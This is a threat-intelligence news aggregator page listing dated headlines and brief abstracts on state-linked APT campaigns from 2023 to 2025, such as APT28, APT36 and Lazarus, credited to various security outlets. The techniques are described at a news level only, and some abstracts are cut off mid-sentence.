Advanced Persistent Threat
June 20, 2025
APT36 Phishing Campaign Targets Indian Defense Using Credential-Stealing Malware Full Text
Abstract
APT36 is conducting a targeted phishing campaign against Indian defense personnel. The campaign uses spear-phishing emails with malicious PDF attachments that mimic official government documents to deliver credential-stealing malware.Cyfirma
May 27, 2025
Velvet Chollima APTHackers Target Government Officials Using Weaponized PDFs Full Text
Abstract
A new cyber-espionage campaign attributed to the North Korean APT group Velvet Chollima has been identified, targeting South Korean government officials and organizations across North America, South America, Europe, and East Asia.GBHackers
May 15, 2025
Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers Full Text
Abstract
A cyber-espionage campaign by Fancy Bear (APT28), linked to Russia’s GRU, has targeted Ukrainian government and military entities, as well as international defense contractors.Cyber Scoop
May 14, 2025
Swan Vector APT: Targeting Taiwan & Japan with DLL Implants Full Text
Abstract
A newly identified APT campaign, dubbed “Swan Vector,” has been targeting educational and mechanical engineering sectors in East Asia, particularly Taiwan and Japan. The campaign employs spearphishing emails with malicious ZIP attachmentsSeqRite
May 13, 2025
Analysis of APT37 Attack Case Disguised as a Think Tank for National Security Strategy in South Korea (Operation. ToyBox Story) Full Text
Abstract
APT37 (ScarCruft), a North Korean state-sponsored threat actor, has launched a sophisticated spear-phishing campaign dubbed “Operation: ToyBox Story,” targeting activists focused on North Korean issues.Genians
May 13, 2025
Hackers now testing ClickFix attacks against Linux targets Full Text
Abstract
A new ClickFix campaign by APT36 (Transparent Tribe), a Pakistan-linked threat actor, has expanded its targeting to include Linux systems alongside Windows and macOS. It impersonates India's Ministry of Defence to lure victims.Bleeping Computer
April 26, 2025
Operation SyncHole: Lazarus APT targets supply chains in South Korea Full Text
Abstract
The campaign has been active since at least November 2024, Lazarus Group is targeting South Korean organizations using watering hole tactics and exploiting software vulnerabilities.Security Affairs
April 23, 2025
Russian APT Gamaredon targets Ukraine with new LNK Full Text
Abstract
Security researchers have uncovered a new campaign by the Russian-affiliated APT group Gamaredon, leveraging the PteroLNK variant of the Pterodo malware family to target Ukrainian military, government, and infrastructure sectors.SC World
April 23, 2025
APT34 Hackers Use Port 8080 for Fake 404 Responses and Shared SSH Keys Full Text
Abstract
Researchers have identified dormant but potentially malicious infrastructure linked to the Iranian threat group APT34 (OilRig), known for targeting sectors such as education, government, energy, telecom, and NGOs.GBHackers
April 16, 2025
Mustang Panda: PAKLOG, CorKLOG, and SplatCloak Full Text
Abstract
Mustang Panda, a China-linked APT group, has expanded its malware arsenal with PAKLOG and CorKLOG and an EDR evasion driver named SplatCloak. The malware is delivered via RAR archives containing legitimate signed binaries and malicious DLLs.ZScalar
March 28, 2025
APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware Full Text
Abstract
A Pakistan-linked APT group has been found creating a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country.The Hacker News
March 25, 2025
Chinese Weaver Ant Hackers Spied on Telco Network for Four Years Full Text
Abstract
A China-linked advanced threat group named Weaver Ant spent more than four years in the network of a telecommunications services provider, hiding traffic and infrastructure with the help of compromised Zyxel CPE routers.Bleeping Computer
March 22, 2025
Chinese APT Aquatic Panda Conducted Global Espionage Campaign Affecting Seven Targets Using Five Malware Families Full Text
Abstract
The targeted entities include governments, catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.The Hacker News
March 13, 2025
SideWinder APT Targets Maritime, Nuclear, and IT Sectors Across Asia, Middle East, and Africa Full Text
Abstract
The attacks, observed in 2024, spread across Bangladesh, Cambodia, Djibouti, Egypt, the United Arab Emirates, and Vietnam. Other targets of interest include nuclear power plants and nuclear energy infrastructure in South Asia and Africa.The Hacker News
March 11, 2025
North Korean Hackers Use ZIP Files to Deploy Malicious PowerShell Scripts Full Text
Abstract
North Korean state-sponsored hackers, known as APT37 or ScarCruft, have been employing sophisticated tactics to breach systems, leveraging malicious ZIP files containing LNK files to initiate attacks.GBHackers
February 19, 2025
Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign Full Text
Abstract
The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024.The Hacker News
February 14, 2025
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks Full Text
Abstract
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, also tracked as APT43, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.The Hacker News
February 1, 2025
CL-STA-0048 Espionage Operation Takes Aim at High-Value Targets in South Asia Full Text
Abstract
The campaign primarily aimed to obtain the personal information of government employees and steal sensitive data from targeted organizations. These objectives bear the hallmarks of a nation-state advanced persistent threat (APT) espionage operation.Palo Alto Networks
January 22, 2025
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack Full Text
Abstract
PlushDaemon is assessed to be a China-nexus group that has been operational since at least 2019, targeting individuals and entities in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.The Hacker News
January 21, 2025
Researchers Found New Android Malware Linked to DoNot Team APT Group Full Text
Abstract
The DoNot APT group has been observed misusing the OneSignal platform, which typically provides tools for sending push notifications, in-app messages, emails, and SMS. The group is leveraging OneSignal to deliver phishing links through notifications.Security Affairs
December 3, 2024
APT35 Forges Recruitment Sites, Launches Attacks on Aerospace and Semiconductor Industries in Multiple Countries Full Text
Abstract
In one of its campaigns, APT35 launched a fake recruitment site, particularly aimed at experts in drone design within the aerospace sector in Thailand. The site featured high-paying job postings, adding legitimacy to the ruse.Threat Book
November 23, 2024
Earth Kasha Upgraded Their Arsenal With New Tactics To Attack Organizations Full Text
Abstract
Earth Kasha, a threat actor linked to APT10, has expanded its targeting scope to India, Taiwan, and Japan, leveraging spear-phishing and exploiting vulnerabilities in public-facing applications like SSL-VPN and file storage services.GBHackers
November 16, 2024
LightSpy: APT41 Deploys Advanced DeepData Framework In Targeted Southern Asia Espionage Campaign Full Text
Abstract
DeepData v3.2.1228 framework allows for extensive data theft across platforms like WhatsApp, Telegram, Signal, DingDing, and Feishu. It consists of 12 specialized plugins for extracting messaging data, emails, credentials, and system information.Black Berry
November 9, 2024
North Korean APT BlueNoroff Targets Macs with Fake Crypto News and Novel Persistence Full Text
Abstract
SentinelLabs found a new type of malware being used by North Korean hackers to target businesses that deal with cryptocurrency. This malware is similar to attacks previously linked to BlueNoroff.SentinelOne
November 5, 2024
APT36 Deploys ElizaRAT and ApoloStealer in Attacks on Indian Targets Full Text
Abstract
Over the past year, APT36 has been observed using three different versions of ElizaRAT in separate campaigns targeting Indian entities, with the latest version using Google Drive for command-and-control communications.Dark Reading
October 29, 2024
Evasive Panda Using New CloudScout Toolset to Steal Data From Google Drive, Gmail, and Outlook Full Text
Abstract
A toolset called CloudScout developed by the APT group Evasive Panda is targeting Taiwanese institutions to extract cloud-based data. The attacks, discovered by ESET, exploit session cookies stolen by MgBot plugins to access cloud services.WeLiveSecurity
October 28, 2024
Russia’s APT29 Mimics AWS to Steal Windows Credentials Full Text
Abstract
A recent campaign by APT29 involved sending emails from fake Amazon Web Services (AWS) domains to trick recipients into opening malicious attachments containing configuration files for Remote Desktop.Cyware
October 22, 2024
New China-Nexus APT Group IcePeony Targeting Asian Nations Full Text
Abstract
IcePeony employs sophisticated attack methods such as SQL injection, webshells, and a unique malware known as "IceCache" to achieve its goals. The group's primary objective seems to be credential theft.Cyware
September 20, 2024
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks Full Text
Abstract
UNC1860 has been observed using victim networks as staging areas for additional operations, targeting entities in Saudi Arabia and Qatar. They overlap with APT34, assisting in lateral movement within compromised organizations.September 10, 2024
Chinese APT Group Abuses Visual Studio Code to Target Government in Asia Full Text
Abstract
Chinese APT group Stately Taurus exploited Visual Studio Code to target government entities in Southeast Asia for cyberespionage. They utilized the software's reverse shell feature to infiltrate networks, a technique first detected in 2023.Palo Alto Networks
September 3, 2024
North Korea-linked APT Citrine Sleet Exploit Chrome Zero-Day to Deliver FudModule Rootkit Full Text
Abstract
A North Korean APT used a Google Chrome zero-day flaw, CVE-2024-7971, to deploy the FudModule rootkit. Microsoft researchers linked these attacks to Citrine Sleet (AppleJeus, Labyrinth Chollima, UNC4736, or Hidden Cobra) with medium confidence.Security Affairs
August 31, 2024
Operation DevilTiger: APT-Q-12’s Shadowy Tactics and Zero-Day Exploits Unveiled Full Text
Abstract
The QiAnXin Threat Intelligence Center has revealed the details of "Operation DevilTiger," a cyber espionage campaign carried out by the elusive APT-Q-12 group, also known as "Pseudo Hunter."Security Online
August 24, 2024
China-linked APT Velvet Ant Exploited Zero-Day to Compromise Cisco Nexus Switches Full Text
Abstract
The China-linked APT group Velvet Ant exploited a zero-day vulnerability in Cisco switches, CVE-2024-20399, to take control of network devices. The flaw in Cisco NX-OS Software's CLI enabled attackers with Admin credentials to run arbitrary commands.Security Affairs
July 20, 2024
APT41 Has Arisen From the DUST Full Text
Abstract
APT41, a China-based hacking group, has targeted organizations in shipping, logistics, media, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. since 2023.May 15, 2024
SideCopy APT Campaign Found Targeting Indian Universities Full Text
Abstract
Active since May 2023, the SideCopy APT campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents.The Cyber Express
May 11, 2024
‘The Mask’ Espionage Group Resurfaces After 10-Year Hiatus Full Text
Abstract
An advanced persistent threat (APT) group that has been missing in action for more than a decade has suddenly resurfaced in a cyber-espionage campaign targeting organizations in Latin America and Central Africa.Dark Reading
May 6, 2024
NiceCurl and TameCat Custom Backdoors Leveraged by Damselfly APT Full Text
Abstract
The Damselfly Advanced Persistent Threat (APT) group, also known as APT42, has been actively using custom backdoor variants, NiceCurl and TameCat, to infiltrate Windows machines.Broadcom
April 23, 2024
Russian APT28 Group in New “GooseEgg” Hacking Campaign Full Text
Abstract
A notorious Russian APT group has been stealing credentials for years by exploiting a Windows Print Spooler bug and using a novel post-compromise tool known as “GooseEgg,” Microsoft has revealed.Infosecurity Magazine
April 10, 2024
Vedalia APT Group Exploits Oversized LNK Files in Malware Campaign Full Text
Abstract
The Vedalia APT group has ingeniously utilized LNK files with double extensions, effectively masking the malicious .lnk extension. This tactic deceives users into believing the files are harmless, increasing the likelihood of execution.Broadcom
March 26, 2024
US Indicts Accused APT31 Chinese Hackers for Hire Full Text
Abstract
U.S. federal prosecutors indicted seven Chinese nationals they accuse of hacking for a Beijing economic and intelligence espionage group whose operations reacted to geopolitical trends.Bank Info Security
March 20, 2024
Russia-Linked APT28 Targets Victims Worldwide for Intelligence Gathering Full Text
Abstract
Fancy Bear has utilized at least 11 unique lures in campaigns targeting organizations in Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the United States.Dark Reading
March 8, 2024
China-Linked Evasive Panda APT Leverages Monlam Festival to Target Tibetans Full Text
Abstract
The attacks involved compromising websites, such as the Kagyu International Monlam Trust's website, to specifically target users in India, Taiwan, Hong Kong, Australia, and the U.S.Cyware
February 27, 2024
Russian SVR-Linked APT29 Threat Actors Adapt Their Tactics for Initial Cloud Access Full Text
Abstract
The Russian Foreign Intelligence Service (SVR) cyber actors, also known as APT29 or Cozy Bear, have shifted their tactics to target cloud environments as organizations increasingly move to cloud-based infrastructure.Cyware
February 8, 2024
Kimsuky APT Disguises as a Korean Company to Distribute Troll Stealer Full Text
Abstract
Troll Stealer's similarities to known malware families linked to Kimsuky, such as AppleSeed and AlphaSeed, raise concerns about the group's offensive cyber operations and its targeting of South Korean entities.Cyware
February 02, 2024
Russian APT28 Hackers Targeting High-Value Orgs with NTLM Relay Attacks Full Text
Abstract
Russian state-sponsored actors have staged NT LAN Manager (NTLM) v2 hash relay attacks through various methods from April 2022 to November 2023, targeting high-value targets worldwide. The attacks, attributed to an "aggressive" hacking crew called APT28 , have set their eyes on organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils. Cybersecurity firm Trend Micro assessed these intrusions as a "cost-efficient method of automating attempts to brute-force its way into the networks" of its targets, noting the adversary may have compromised thousands of email accounts over time. APT28 is also tracked by the broader cybersecurity community under the names Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. The group, believed to beThe Hacker News
January 31, 2024
Pawn Storm Uses Brute Force and Stealth Against High-Value Targets Full Text
Abstract
Pawn Storm, aka APT28 and Forest Blizzard, has been employing anonymization layers, such as VPN services and compromised EdgeOS routers, to hide its tracks and carry out sophisticated attacks.Cyware
January 26, 2024
Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs Full Text
Abstract
Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew tracked as APT29 , which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. "This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs) and IT service providers, primarily in the U.S. and Europe," the Microsoft Threat Intelligence team said in a new advisory. The primary goal of these espionage missions is to gather sensitive information that is of strategic interest to Russia by maintaining footholds for extended periods of time without attracting any attention. The latest discThe Hacker News
January 20, 2024
China-linked APT UNC3886 Exploits VMware Zero-Day Since 2021 Full Text
Abstract
Mandiant researchers observed UNC3886 exploiting a VMware ESXi zero-day vulnerability in June 2023, using novel malware persistence techniques to achieve administrative access within VMware ESXi Hypervisors.Cyware
January 6, 2024
Iranian APT Used No-Justice Wiper in Recent Albanian Attacks Full Text
Abstract
The cybersecurity firm ClearSky identified the tools used, including the No-Justice wiper and a PowerShell code. The malware had a valid digital signature, making it appear legitimate.Cyware
December 20, 2023
Iranian APT Group Targets Telecom Organizations in North and East Africa Full Text
Abstract
Seedworm (aka Muddywater) continues to use a combination of living-off-the-land and publicly available tools, but has also developed its own custom tools, such as a custom build of Venom Proxy and a custom keylogger.Cyware
December 14, 2023
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders Full Text
Abstract
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k). "These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News. By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructureThe Hacker News
December 14, 2023
Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks Full Text
Abstract
Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29 , which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said . The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affecThe Hacker News
December 14, 2023
China-Linked APT Volt Typhoon Linked to KV-Botnet Attacks Full Text
Abstract
Volt Typhoon utilizes living-off-the-land techniques and hands-on-keyboard activity to evade detection, routing malicious traffic through compromised SOHO network devices and relying on customized versions of open-source tools for communication.Cyware
December 12, 2023
Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign Full Text
Abstract
The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace. IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said . "ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign." Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and RomaniaThe Hacker News
December 11, 2023
Researchers Unmask Sandman APT’s Hidden Link to China-Based KEYPLUG Backdoor Full Text
Abstract
Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG. The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit in the same victim networks. Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively. "Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions," the companies said in a report shared with The Hacker News. "The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."The Hacker News
December 7, 2023
TA422’s Dedicated Exploitation Loop—the Same Week After Week Full Text
Abstract
Russian APT group TA422 has been actively exploiting patched vulnerabilities to target government, aerospace, education, finance, manufacturing, and technology sectors in Europe and North America.Cyware
December 05, 2023
Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability Full Text
Abstract
Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a now-patched critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. The goal, according to the Polish Cyber Command (DKWOC), is to obtain unauthorized access to mailboxes belonging to public and private entities in the country. "In the next stage of maliciThe Hacker News
November 16, 2023
Experts Uncover DarkCasino: New Emerging APT Threat Exploiting WinRAR Flaw Full Text
Abstract
A hacking group that leveraged a recently disclosed security flaw in the WinRAR software as a zero-day has now been categorized as an entirely new advanced persistent threat (APT). Cybersecurity company NSFOCUS has described DarkCasino as an "economically motivated" actor that first came to light in 2021. "DarkCasino is an APT threat actor with strong technical and learning ability, who is good at integrating various popular APT attack technologies into its attack process," the company said in an analysis. "Attacks launched by the APT group DarkCasino are very frequent, demonstrating a strong desire to steal online property." DarkCasino was most recently linked to the zero-day exploitation of CVE-2023-38831 (CVSS score: 7.8), a security flaw that can be weaponized to launch malicious payloads. In August 2023, Group-IB disclosed real-world attacks weaponizing the vulnerability and aimed at online trading forums at least since April 2023 to deliThe Hacker News
November 13, 2023
North Korea-Linked APT Sapphire Sleet Targets IT Job Seekers Full Text
Abstract
They have created fake skills assessment portals to trick recruiters into registering for an account. Previously, they used platforms like LinkedIn and employed lures related to skills assessment.Cyware
November 11, 2023
New APT Group DarkCasino and the Global Surge in WinRAR 0-Day Exploits Full Text
Abstract
DarkCasino exploited a WinRAR 0-day vulnerability (CVE-2023-38831) to launch phishing attacks against forum users, posing a significant threat due to the large installed base and difficulty in identifying and defending against these attacks.Cyware
November 10, 2023
Russian Hackers Sandworm Cause Power Outage in Ukraine Amidst Missile Strikes Full Text
Abstract
The notorious Russian hackers known as Sandworm targeted an electrical substation in Ukraine last year, causing a brief power outage in October 2022. The findings come from Google's Mandiant, which described the hack as a "multi-event cyber attack" leveraging a novel technique for impacting industrial control systems (ICS). "The actor first used OT-level living-off-the-land ( LotL ) techniques to likely trip the victim's substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine," the company said . "Sandworm later conducted a second disruptive event by deploying a new variant of CaddyWiper in the victim's IT environment." The threat intelligence firm did not reveal the location of the targeted energy facility, the duration of the blackout, and the number of people who were impacted by the incident. The development marks Sandworm's continuousThe Hacker News
November 9, 2023
Russian Sandworm APT Group Caused Power Outage in October 2022 Full Text
Abstract
The attack was not driven by military necessity but rather aimed to increase the psychological toll of the war, showcasing Russia's focus on disrupting and degrading military readiness through cyber means.Cyware
November 8, 2023
Chinese APTs Targeting Cambodian Government Full Text
Abstract
By monitoring telemetry associated with two prominent Chinese APT groups, researchers observed network connections predominately originating from Cambodia, including inbound connections originating from at least 24 Cambodian government organizations.Cyware
November 07, 2023
N. Korea’s BlueNoroff Blamed for Hacking macOS Machines with ObjCShellz Malware Full Text
Abstract
The North Korea-linked nation-state group called BlueNoroff has been attributed to a previously undocumented macOS malware strain dubbed ObjCShellz . Jamf Threat Labs, which disclosed details of the malware, said it's used as part of the RustBucket malware campaign, which came to light earlier this year. "Based on previous attacks performed by BlueNoroff, we suspect that this malware was a late stage within a multi-stage malware delivered via social engineering," security researcher Ferdous Saljooki said in a report shared with The Hacker News. BlueNoroff, also tracked under the names APT38, Nickel Gladstone, Sapphire Sleet, Stardust Chollima, and TA444, is a subordinate element of the infamous Lazarus Group that specializes in financial crime, targeting banks and the crypto sector as a way to evade sanctions and generate illicit profits for the regime. The development arrives days after Elastic Security Labs disclosed the Lazarus Group's use of a new maThe Hacker News
November 6, 2023
SideCopy APT’s Multi-Platform Onslaught Targets Indian Government and Defense Entities Full Text
Abstract
SideCopy is employing phishing tactics and using compromised domains with reused IP addresses to distribute malicious files and deploy malware, including a Linux variant of the Ares RAT, indicating a multi-platform approach in their attacks.Cyware
November 6, 2023
Iranian APT Targets Israeli Education, Tech Sectors With New Data Wipers Full Text
Abstract
An Iranian APT group known as Agrius has been targeting higher education and technology organizations in Israel with destructive attacks and wipers, including MultiLayer, PartialWasher, and BFG Agonizer, since January 2023.Cyware
October 19, 2023
New Campaign by Iranian APT Group Targets Middle Eastern Government Full Text
Abstract
The attackers made use of legitimate tools like Plink to configure port-forwarding rules, enabling remote access via the Remote Desktop Protocol (RDP), and modified Windows firewall rules to facilitate their activities.Cyware
October 13, 2023
Researchers Unveil ToddyCat’s New Set of Tools for Data Exfiltration Full Text
Abstract
The advanced persistent threat (APT) actor known as ToddyCat has been linked to a new set of malicious tools that are designed for data exfiltration, offering a deeper insight into the hacking crew's tactics and capabilities. The findings come from Kaspersky, which first shed light on the adversary last year, linking it to attacks against high-profile entities in Europe and Asia for nearly three years. While the group's arsenal prominently features Ninja Trojan and a backdoor called Samurai, further investigation has uncovered a whole new set of malicious software developed and maintained by the actor to achieve persistence, conduct file operations, and load additional payloads at runtime. This comprises a collection of loaders that comes with capabilities to launch the Ninja Trojan as a second stage, a tool called LoFiSe to find and collect files of interest, a DropBox uploader to save stolen data to Dropbox, and Pcexter to exfiltrate archive files to Microsoft OneDrThe Hacker News
October 11, 2023
A New Threat on the Horizon: The Grayling APT Group Full Text
Abstract
Symantec found a previously unidentified threat actor named Grayling conducting advanced persistent attacks targeting organizations in Taiwan, the Pacific Islands, Vietnam, and the U.S., with a focus on intelligence gathering. Grayling's modus operandi seems to revolve around exploiting public infr ... Read MoreCyware
October 10, 2023
Previously Unseen Grayling APT Targets Multiple Organizations in Taiwan Full Text
Abstract
Grayling employs a combination of custom malware and publicly available tools like Havoc, Cobalt Strike, and NetSpy to carry out its attacks, using DLL sideloading techniques and exploiting vulnerabilities like CVE-2019-0803.Cyware
October 10, 2023
Researchers Uncover Grayling APT’s Ongoing Attack Campaign Across Industries Full Text
Abstract
A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team, part of Broadcom, attributed the attacks to an advanced persistent threat (APT) it tracks under the name Grayling . Evidence shows that the campaign began in February 2023 and continued until at least May 2023. Also likely targeted as part of the activity is a government agency located in the Pacific Islands, as well as entities in Vietnam and the U.S. "This activity stood out due to the use by Grayling of a distinctive DLL side-loading technique that uses a custom decryptor to deploy payloads," the company said in a report shared with The Hacker News. "The motivation driving this activity appears to be intelligence gathering." The initial foothold to victim environments is said to have been achieved by exploiting public-facing infrastructure,The Hacker News
September 30, 2023
Iranian APT Group OilRig Using New Menorah Malware for Covert Operations Full Text
Abstract
Sophisticated cyber actors backed by Iran known as OilRig have been linked to a spear-phishing campaign that infects victims with a new strain of malware called Menorah. "The malware was designed for cyberespionage, capable of identifying the machine, reading and uploading files from the machine, and downloading another file or malware," Trend Micro researchers Mohamed Fahmy and Mahmoud Zohdy said in a Friday report. The victimology of the attacks is not immediately known, although the use of decoys indicates at least one of the targets is an organization located in Saudi Arabia. Also tracked under the names APT34, Cobalt Gypsy, Hazel Sandstorm, and Helix Kitten, OilRig is an Iranian advanced persistent threat (APT) group that specializes in covert intelligence gathering operations to infiltrate and maintain access within targeted networks. The revelation builds on recent findings from NSFOCUS, which uncovered an OilRig phishing attack resulting in the deploymenThe Hacker News
September 26, 2023
Sandman APT Brings LuaDream, Targets Telcos in Middle East Full Text
Abstract
SentinelOne found the Sandman APT group targeting telecommunications companies in the Middle East, Western Europe, and South Asia using a novel backdoor called LuaDream. The researchers noted that the campaign began in August and demonstrates advanced tactics. With this, the Middle East is onc ... Read MoreCyware
September 22, 2023
Sandman APT Infiltrates Telecommunications Companies Using LuaDream Backdoor Full Text
Abstract
The activities of Sandman suggest espionage motivations, with a focus on telecommunications providers and a potential connection to a private contractor or mercenary group.Cyware
September 19, 2023
Transparent Tribe Uses Fake YouTube Android Apps to Spread CapraRAT Malware Full Text
Abstract
The suspected Pakistan-linked threat actor known as Transparent Tribe is using malicious Android apps mimicking YouTube to distribute the CapraRAT mobile remote access trojan (RAT), demonstrating the continued evolution of the activity. "CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects," SentinelOne security researcher Alex Delamotte said in a Monday analysis. Transparent Tribe , also known as APT36, is known to target Indian entities for intelligence-gathering purposes, relying on an arsenal of tools capable of infiltrating Windows, Linux, and Android systems. A crucial component of its toolset is CapraRAT , which has been propagated in the form of trojanized secure messaging and calling apps branded as MeetsApp and MeetUp. These weaponized apps are distributed using social engineering lures. The latest set of Android package (APK) files discovered by SentinelOne are engineered to masThe Hacker News
September 06, 2023
Ukraine’s CERT Thwarts APT28’s Cyberattack on Critical Energy Infrastructure Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain. "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file 'weblinks.cmd' to the victim's computer," CERT-UA said , attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE). "When a CMD file is run, several decoy web pages will be opened, .bat and .vbs files will be created, and a VBS file will be launched, which in turn will execute the BAT file." The next phase of the attack involves running the "whoami" command on the compromised host and exfiltrating the information, alongside downloading the TOR hidden service to route malicious traffic. Persistence is achieveThe Hacker News
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County Full Text
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say.Cyware
September 01, 2023 – Malware
Russian State-Backed ‘Infamous Chisel’ Android Malware Targets Ukrainian Military Full Text
Abstract
Cybersecurity and intelligence agencies from Australia, Canada, New Zealand, the U.K., and the U.S. on Thursday disclosed details of a mobile malware strain targeting Android devices used by the Ukrainian military. The malicious software, dubbed Infamous Chisel and attributed to a Russian state-sponsored actor called Sandworm, has capabilities to "enable unauthorized access to compromised devices, scan files, monitor traffic, and periodically steal sensitive information." Some aspects of the malware were uncovered by the Security Service of Ukraine (SBU) earlier in August, highlighting unsuccessful attempts on part of the adversary to penetrate Ukrainian military networks and gather valuable intelligence. It's said that Russian forces captured tablets used by Ukraine on the battlefield, using them as a foothold to remotely disseminate the malware to other devices by using the Android Debug Bridge ( ADB ) command-line tool. Sandworm, also known by the names FROZENBARENTS, IrThe Hacker News
September 1, 2023 – Breach
LogicMonitor Customers Hit by Hackers Due to Weak Default Passwords Full Text
Abstract
Some customers of the network security company LogicMonitor have been hacked due to the use of default passwords, TechCrunch has learned. A LogicMonitor spokesperson confirmed “a security incident” affecting some of the company’s customers.Cyware
September 01, 2023 – Phishing
New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists Full Text
Abstract
A new phishing attack likely targeting civil society groups in South Korea has led to the discovery of a novel remote access trojan called SuperBear . The intrusion singled out an unnamed activist, who was contacted in late August 2023 and received a malicious LNK file from an address impersonating a member of the organization, non-profit entity Interlabs said in a new report. The LNK file, upon execution, launches a PowerShell command to execute a Visual Basic script that, in turn, fetches the next-stage payloads from a legitimate but compromised WordPress website. This includes the Autoit3.exe binary ("solmir.pdb") and an AutoIt script ("solmir_1.pdb") that's launched using the former. The AutoIt script, for its part, performs process injection using a process hollowing technique , in which malicious code is inserted into a process that's in a suspended state. In this case, an instance of Explorer.exe is spawned to inject a never-before-seen RAT referred to as SuperBear thThe Hacker News
